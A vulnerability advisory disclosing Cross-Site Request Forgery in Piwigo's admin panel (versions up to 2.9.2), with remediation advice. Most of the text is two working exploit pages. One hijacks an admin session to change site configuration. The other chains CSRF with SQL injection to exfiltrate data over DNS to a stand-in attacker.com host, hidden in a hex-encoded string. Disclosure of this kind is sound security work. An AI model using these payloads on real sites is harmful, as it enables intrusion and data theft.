Affected Version : <=2.9.2
Description:
It was identified that admin panel of Piwigo application is vulnerable to Cross Site Request Forgery vulnerabilities. An attacker can exploit these vulnerabilities to coerce user in performing unintended actions.
Vulnerable Instances:
- /admin.php?page=configuration§ion=main
Steps to Reproduce
- Login to
admin
user account. - Save the following exploit in a new html file, example:
csrf_exploit.html
.
CSRF Exploit
<!-- csrf_exploit.html -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/piwigo-2.9.2\/piwigo\/admin.php?page=configuration§ion=main", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "gallery_title=CSRF+ATTACK&page_banner=test+banner&order_by%5B%5D=date_available+DESC&order_by%5B%5D=file+ASC&order_by%5B%5D=id+ASC&rate_anonymous=on&allow_user_registration=on&allow_user_customization=on&week_starts_on=monday&history_guest=on&log=on&mail_theme=clear&submit=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>
- Open the
csrf_exploit.html
file in the same browser in a new tab as ofadmin
user has logged in. - Observe the title of application is changed to
CSRF ATTACK
.
Following Exploit
shows that using above attack an attacker can exploit other vulnerabilities with in the application such as SQL Injection
and exfiltrate data via DNS queries.
<!--Out of SQL Injection via CSRF-->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/piwigo-2.9.2\/piwigo\/admin.php?page=batch_manager&mode=unit", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "element_ids=12%2c13)+union+select+LOAD_FILE(group_concat(0x2f2f2f2f,(select+@@version_compile_os),0x2e61747461636b65722e636f6d2f2f6d7973716c5f65787472616374)),2+--+&name-12=funny+cat+5-wallpaper-1920x1080&author-12=this+is+test&date_creation-12=2016-11-24+00%3A00%3A00&level-12=0&tags-12%5B%5D=this+is+test&description-12=this+is+test&name-13=pirates+of+the+caribbean+dead+men+tell+no+tales-wallpaper-960x600&author-13=this+is+test2&date_creation-13=2016-11-23+00%3A00%3A00&level-13=0&tags-13%5B%5D=this+is+test2&description-13=this+is+test2&submit=Submit";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>
Remediation:
Piwigo 2.9.2 application implements CSRF attack protection via _csrf
tokens in number of components, it is recommended to implement similar protection for Configuration
components. Addition information on CSRF Prevention techniques can be found here.
Vendor Patches:
The patch released by vendor for this issue can be found here